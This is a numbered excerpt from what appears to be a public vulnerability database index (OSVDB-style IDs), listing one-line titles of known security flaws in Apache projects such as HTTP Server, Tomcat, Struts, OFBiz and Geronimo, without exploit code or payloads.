7827| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
7828| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
7829| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
7830| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
7831| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
7832| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
7833| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
7834| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
7835| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
7836| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
7837| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
7838| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
7839| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
7840| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
7841| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
7842| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
7843| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
7844| [80300] Apache Wicket wicket:pageMapName Parameter XSS
7845| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
7846| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
7847| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
7848| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
7849| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
7850| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
7851| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
7852| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
7853| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
7854| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
7855| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
7856| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
7857| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
7858| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
7859| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
7860| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
7861| [78331] Apache Tomcat Request Object Recycling Information Disclosure
7862| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
7863| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
7864| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
7865| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
7866| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
7867| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
7868| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
7869| [77593] Apache Struts Conversion Error OGNL Expression Injection
7870| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
7871| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
7872| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
7873| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
7874| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
7875| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
7876| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
7877| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
7878| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
7879| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
7880| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
7881| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
7882| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
7883| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
7884| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
7885| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
7886| [74725] Apache Wicket Multi Window Support Unspecified XSS
7887| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
7888| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
7889| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
7890| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
7891| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
7892| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
7893| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
7894| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
7895| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
7896| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
7897| [73644] Apache XML Security Signature Key Parsing Overflow DoS
7898| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
7899| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
7900| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
7901| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
7902| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
7903| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
7904| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
7905| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
7906| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
7907| [73154] Apache Archiva Multiple Unspecified CSRF
7908| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
7909| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
7910| [72238] Apache Struts Action / Method Names <
7911| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
7912| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
7913| [71557] Apache Tomcat HTML Manager Multiple XSS
7914| [71075] Apache Archiva User Management Page XSS
7915| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
7916| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
7917| [70924] Apache Continuum Multiple Admin Function CSRF
7918| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
7919| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
7920| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
7921| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
7922| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
7923| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
7924| [69520] Apache Archiva Administrator Credential Manipulation CSRF
7925| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
7926| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
7927| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
7928| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
7929| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
7930| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
7931| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
7932| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
7933| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
7934| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
7935| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
7936| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
7937| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
7938| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
7939| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
7940| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
7941| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
7942| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
7943| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
7944| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
7945| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
7946| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
7947| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
7948| [65054] Apache ActiveMQ Jetty Error Handler XSS
7949| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
7950| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
7951| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
7952| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
7953| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
7954| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
7955| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
7956| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
7957| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
7958| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
7959| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
7960| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
7961| [63895] Apache HTTP Server mod_headers Unspecified Issue
7962| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
7963| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
7964| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
7965| [63140] Apache Thrift Service Malformed Data Remote DoS
7966| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
7967| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
7968| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
7969| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
7970| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
7971| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
7972| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
7973| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
7974| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
7975| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
7976| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
7977| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
7978| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
7979| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
7980| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
7981| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
7982| [60678] Apache Roller Comment Email Notification Manipulation DoS
7983| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
7984| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
7985| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
7986| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
7987| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
7988| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
7989| [60232] PHP on Apache php.exe Direct Request Remote DoS
7990| [60176] Apache Tomcat Windows Installer Admin Default Password
7991| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
7992| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
7993| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
7994| [59944] Apache Hadoop jobhistory.jsp XSS
7995| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
7996| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
7997| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
7998| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
7999| [59019] Apache mod_python Cookie Salting Weakness
8000| [59018] Apache Harmony Error Message Handling Overflow
8001| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
8002| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
8003| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
8004| [59010] Apache Solr get-file.jsp XSS
8005| [59009] Apache Solr action.jsp XSS
8006| [59008] Apache Solr analysis.jsp XSS
8007| [59007] Apache Solr schema.jsp Multiple Parameter XSS
8008| [59006] Apache Beehive select / checkbox Tag XSS
8009| [59005] Apache Beehive jpfScopeID Global Parameter XSS
8010| [59004] Apache Beehive Error Message XSS
8011| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
8012| [59002] Apache Jetspeed default-page.psml URI XSS
8013| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
8014| [59000] Apache CXF Unsigned Message Policy Bypass
8015| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
8016| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
8017| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
8018| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
8019| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
8020| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
8021| [58993] Apache Hadoop browseBlock.jsp XSS
8022| [58991] Apache Hadoop browseDirectory.jsp XSS
8023| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
8024| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
8025| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
8026| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
8027| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
8028| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
8029| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
8030| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
8031| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
8032| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
8033| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
8034| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
8035| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
8036| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
8037| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
8038| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
8039| [58974] Apache Sling /apps Script User Session Management Access Weakness
8040| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
8041| [58931] Apache Geronimo Cookie Parameters Validation Weakness
8042| [58930] Apache Xalan-C++ XPath Handling Remote DoS
8043| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
8044| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
8045| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
8046| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
8047| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
8048| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
8049| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
8050| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
8051| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
8052| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
8053| [58805] Apache Derby Unauthenticated Database / Admin Access
8054| [58804] Apache Wicket Header Contribution Unspecified Issue
8055| [58803] Apache Wicket Session Fixation
8056| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
8057| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
8058| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
8059| [58799] Apache Tapestry Logging Cleartext Password Disclosure
8060| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
8061| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
8062| [58796] Apache Jetspeed Unsalted Password Storage Weakness
8063| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
8064| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
8065| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
8066| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
8067| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
8068| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
8069| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
8070| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
8071| [58775] Apache JSPWiki preview.jsp action Parameter XSS
8072| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8073| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
8074| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
8075| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
8076| [58770] Apache JSPWiki Group.jsp group Parameter XSS
8077| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
8078| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
8079| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
8080| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
8081| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8082| [58763] Apache JSPWiki Include Tag Multiple Script XSS
8083| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
8084| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
8085| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
8086| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
8087| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
8088| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
8089| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
8090| [58755] Apache Harmony DRLVM Non-public Class Member Access
8091| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
8092| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
8093| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
8094| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
8095| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
8096| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
8097| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
8098| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
8099| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
8100| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
8101| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
8102| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
8103| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
8104| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
8105| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
8106| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
8107| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
8108| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
8109| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
8110| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
8111| [58725] Apache Tapestry Basic String ACL Bypass Weakness
8112| [58724] Apache Roller Logout Functionality Failure Session Persistence
8113| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
8114| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
8115| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
8116| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
8117| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
8118| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
8119| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
8120| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
8121| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
8122| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
8123| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
8124| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
8125| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
8126| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
8127| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
8128| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
8129| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
8130| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
8131| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
8132| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
8133| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
8134| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
8135| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
8136| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
8137| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
8138| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
8139| [58687] Apache Axis Invalid wsdl Request XSS
8140| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
8141| [58685] Apache Velocity Template Designer Privileged Code Execution
8142| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
8143| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
8144| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
8145| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
8146| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
8147| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
8148| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
8149| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
8150| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
8151| [58667] Apache Roller Database Cleartext Passwords Disclosure
8152| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
8153| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
8154| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
8155| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
8156| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
8157| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
8158| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
8159| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
8160| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
8161| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
8162| [56984] Apache Xerces2 Java Malformed XML Input DoS
8163| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
8164| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
8165| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
8166| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
8167| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
8168| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
8169| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
8170| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
8171| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
8172| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
8173| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
8174| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
8175| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
8176| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
8177| [55056] Apache Tomcat Cross-application TLD File Manipulation
8178| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
8179| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
8180| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
8181| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
8182| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
8183| [54589] Apache Jserv Nonexistent JSP Request XSS
8184| [54122] Apache Struts s:a / s:url Tag href Element XSS
8185| [54093] Apache ActiveMQ Web Console JMS Message XSS
8186| [53932] Apache Geronimo Multiple Admin Function CSRF
8187| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
8188| [53930] Apache Geronimo /console/portal/ URI XSS
8189| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
8190| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
8191| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
8192| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
8193| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
8194| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
8195| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
8196| [53380] Apache Struts Unspecified XSS
8197| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
8198| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
8199| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
